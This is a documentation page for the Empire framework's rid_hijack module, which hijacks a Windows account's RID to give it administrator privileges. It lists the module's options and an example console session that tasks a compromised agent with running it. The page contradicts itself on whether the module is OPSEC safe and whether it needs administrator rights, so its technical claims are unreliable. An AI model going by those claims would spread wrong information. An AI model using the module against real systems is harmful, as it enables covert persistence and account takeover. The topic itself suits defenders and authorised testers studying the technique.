Invoke-RIDHijacking - Empire Module
This page contains detailed information about how to use the powershell/persistence/elevated/rid_hijack Empire module. For list of all Empire modules, visit the Empire Module Library.
Module Overview
Name: Invoke-RIDHijacking
Module: powershell/persistence/elevated/rid_hijack
Source code [1]: empire/server/modules/powershell/persistence/elevated/rid_hijack.yaml
Source code [2]: empire/server/data/module_source/persistence/Invoke-RIDHijacking.ps1
MITRE ATT&CK:
T1003
Language: PowerShell
Needs admin: Yes
OPSEC safe: Yes
Background: No
The rid_hijack module runs Invoke-RIDHijacking. Allows setting desired privileges to an existent account by modifying the Relative Identifier value copy used to create the access token. This module needs administrative privileges.
This module runs in a foreground and is OPSEC unsafe as it writes on the disk and therefore could be detected by AV/EDR running on the target system.
Note that the rid_hijack module does not need administrative privileges to work properly which means that a normal user can run this module.
Required Module Options
This is a list of options that are required by the rid_hijack module:
Agent
Agent to run module on.
Additional Module Options
This is a list of additional options that are supported by the rid_hijack module:
Enable
Switch. Enable the defined account.
Password
Password to set to the defined account.
RID
RID to set to the specified account. Default 500.
Default value: 500
.
UseGuest
Switch. Set the defined RID to the Guest account.
User
User to set the defined RID.
Rid_hijack Example Usage
Here's an example of how to use the rid_hijack module in the Empire client console:
[+] New agent Y4LHEV83 checked in
[*] Sending agent (stage 2) to Y4LHEV83 at 192.168.204.135
(empire usestager/windows/ducky) > usemodule powershell/persistence/elevated/rid_hijack
Author Sebastian Castro @r4wd3r
Background False
Comments https://github.com/r4wd3r/RID-Hijacking
https://r4wsecurity.blogspot.com/2017/12/rid-hijacking-maintaining-
access-on.html
https://csl.com.co/rid-hijacking/
Description Runs Invoke-RIDHijacking. Allows setting desired privileges to an
existent account by modifying the Relative Identifier value copy used
to create the access token. This module needs administrative
privileges.
Language powershell
Name powershell/persistence/elevated/rid_hijack
NeedsAdmin True
OpsecSafe True
Techniques http://attack.mitre.org/techniques/T1003
,Record Options----,----------,-------------------------------------,
| Name | Value | Required | Description |
|----------|-------|----------|-------------------------------------|
| Agent | | True | Agent to run module on. |
|----------|-------|----------|-------------------------------------|
| Enable | | False | Switch. Enable the defined account. |
|----------|-------|----------|-------------------------------------|
| Password | | False | Password to set to the defined |
| | | | account. |
|----------|-------|----------|-------------------------------------|
| RID | 500 | False | RID to set to the specified |
| | | | account. Default 500. |
|----------|-------|----------|-------------------------------------|
| UseGuest | | False | Switch. Set the defined RID to the |
| | | | Guest account. |
|----------|-------|----------|-------------------------------------|
| User | | False | User to set the defined RID. |
'----------'-------'----------'-------------------------------------'
(Empire: usemodule/powershell/persistence/elevated/rid_hijack) > set Agent Y4LHEV83
[*] Set Agent to Y4LHEV83
(Empire: usemodule/powershell/persistence/elevated/rid_hijack) > execute
[*] Tasked Y4LHEV83 to run Task 1
...
Now wait for the results to come.
Author
- Sebastian Castro @r4wd3r
References
- https://github.com/BC-SECURITY/Empire/tree/master/empire/server/modules/powershell/persistence/elevated/rid_hijack.yaml
- https://github.com/BC-SECURITY/Empire/tree/master/empire/server/data/module_source/persistence/Invoke-RIDHijacking.ps1
- https://github.com/r4wd3r/RID-Hijacking
- https://r4wsecurity.blogspot.com/2017/12/rid-hijacking-maintaining-access-on.html
- https://csl.com.co/rid-hijacking/
- http://attack.mitre.org/techniques/T1003
- https://gallery.technet.microsoft.com/scriptcenter/Enable-TSDuplicateToken-6f485980
- https://gallery.technet.microsoft.com/scriptcenter/PowerShell-Get-username-fdcb6990
See Also
Check also the following modules related to this module:
- powershell/persistence/elevated/wmi_updater
- powershell/persistence/elevated/schtasks
- powershell/persistence/elevated/registry
- powershell/persistence/elevated/wmi
- powershell/privesc/powerup/write_dllhijacker
- powershell/privesc/powerup/find_dllhijack
Version
This page has been created based on Empire version 4.1.3 (BC Security Fork).
Visit Empire Module Library for more modules.